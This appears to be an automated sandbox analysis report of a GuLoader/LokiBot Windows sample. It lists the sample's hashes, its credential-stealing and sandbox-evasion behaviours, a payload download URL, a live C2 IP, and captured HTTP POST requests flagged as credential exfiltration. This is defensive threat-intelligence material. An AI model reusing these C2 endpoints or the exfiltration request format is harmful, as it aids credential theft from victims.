Windows Analysis Report SecuriteInfo.com.__vbaHresultCheckObj.22789.613

Overview

General Information

Sample Name: SecuriteInfo.com.__vbaHresultCheckObj.22789.613 (renamed file extension from 613 to exe)
Analysis ID: 483722
MD5: 308fb834ee02960ec122cf34712fa871
SHA1: 3162aff052c28b2ebf265eaaf5eadd0311e4299d
SHA256: a08af8c30e5a30a847fc94e370082ff8b9c9c7d5317d4fed0c3b4bc5854a496f
Tags: exe

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Virustotal: Detection: 23%
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe ReversingLabs: Detection: 15%
Multi AV Scanner detection for domain / URL
Source: http://136.243.159.53/~element/page.php?id=121 Virustotal: Detection: 6%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49795 -> 136.243.159.53:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16hJeQVa7vEC
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 136.243.159.53
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0c-5o-docs.googleusercontent.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  POST /~element/page.php?id=121 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 136.243.159.53
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: BA1747BC
  Content-Length: 190
  Connection: close
Source: global traffic HTTP traffic detected:
  POST /~element/page.php?id=121 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 136.243.159.53
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: BA1747BC
  Content-Length: 163
  Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 15 Sep 2021 10:18:26 GMT
  Server: Apache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: http://136.243.159.53/~element/page.php?id=121
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: http://136.243.159.53/~element/page.php?id=121.
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/-
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722932523.0000000000940000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/tography
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5
Source: unknown HTTP traffic detected:
  POST /~element/page.php?id=121 HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 136.243.159.53
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: BA1747BC
  Content-Length: 190
  Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD588F 0_2_02AD588F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0688 0_2_02AD0688
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E9C 0_2_02AD0E9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5491 0_2_02AD5491
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD58DE 0_2_02AD58DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD987C 0_2_02AD987C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5B66 0_2_02AD5B66
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD12AF 0_2_02AD12AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD98AF 0_2_02AD98AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0EA9 0_2_02AD0EA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD84A7 0_2_02AD84A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9AA1 0_2_02AD9AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD20BC 0_2_02AD20BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2AB1 0_2_02AD2AB1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD60B1 0_2_02AD60B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3AB3 0_2_02AD3AB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E8D 0_2_02AD8E8D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4689 0_2_02AD4689
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6081 0_2_02AD6081
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E9D 0_2_02AD8E9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E99 0_2_02AD0E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD829A 0_2_02AD829A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8CE9 0_2_02AD8CE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD36E8 0_2_02AD36E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0AE4 0_2_02AD0AE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8AE1 0_2_02AD8AE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1CFE 0_2_02AD1CFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2AF0 0_2_02AD2AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD30CC 0_2_02AD30CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD08C4 0_2_02AD08C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD20C7 0_2_02AD20C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0AC2 0_2_02AD0AC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E2D 0_2_02AD8E2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6035 0_2_02AD6035
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0A30 0_2_02AD0A30
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4408 0_2_02AD4408
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1000 0_2_02AD1000
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0A17 0_2_02AD0A17
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1417 0_2_02AD1417
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD327C 0_2_02AD327C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1C74 0_2_02AD1C74
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9277 0_2_02AD9277
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2672 0_2_02AD2672
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4A72 0_2_02AD4A72
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3A45 0_2_02AD3A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4DA9 0_2_02AD4DA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5FBB 0_2_02AD5FBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD09BA 0_2_02AD09BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD39B1 0_2_02AD39B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8BB3 0_2_02AD8BB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2384 0_2_02AD2384
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5582 0_2_02AD5582
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD159D 0_2_02AD159D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8D9D 0_2_02AD8D9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7B98 0_2_02AD7B98
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3F96 0_2_02AD3F96
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1F91 0_2_02AD1F91
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07E7 0_2_02AD07E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07E1 0_2_02AD07E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD89F6 0_2_02AD89F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD05F3 0_2_02AD05F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07C3 0_2_02AD07C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD47D0 0_2_02AD47D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4F3F 0_2_02AD4F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD833A 0_2_02AD833A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4935 0_2_02AD4935
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2F08 0_2_02AD2F08
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4102 0_2_02AD4102
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD111F 0_2_02AD111F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8D7E 0_2_02AD8D7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD614D 0_2_02AD614D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D4A 0_2_02AD7D4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5F5B 0_2_02AD5F5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9955 0_2_02AD9955
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1350 0_2_02AD1350
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E9C NtWriteVirtualMemory,TerminateProcess, 0_2_02AD0E9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5491 NtWriteVirtualMemory, 0_2_02AD5491
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD944B NtProtectVirtualMemory, 0_2_02AD944B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5B66 NtAllocateVirtualMemory, 0_2_02AD5B66
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE NtWriteVirtualMemory, 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD50B2 NtWriteVirtualMemory, 0_2_02AD50B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4689 NtWriteVirtualMemory, 0_2_02AD4689
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5C2A NtAllocateVirtualMemory, 0_2_02AD5C2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD940C NtProtectVirtualMemory, 0_2_02AD940C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2672 NtWriteVirtualMemory, 0_2_02AD2672
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4A72 NtWriteVirtualMemory, 0_2_02AD4A72
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4DA9 NtWriteVirtualMemory, 0_2_02AD4DA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7B98 NtWriteVirtualMemory, 0_2_02AD7B98
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1F91 NtWriteVirtualMemory, 0_2_02AD1F91
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD05F3 NtWriteVirtualMemory, 0_2_02AD05F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD47D0 NtWriteVirtualMemory, 0_2_02AD47D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4F3F NtWriteVirtualMemory, 0_2_02AD4F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4935 NtWriteVirtualMemory, 0_2_02AD4935
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D4A NtWriteVirtualMemory, 0_2_02AD7D4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_0056A07B Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 22_2_0056A07B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F61 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F61
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F54 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F54
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F1A LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F1A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F18 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F18
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000000.222100367.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000000.501841988.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
PE file contains strange resources
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
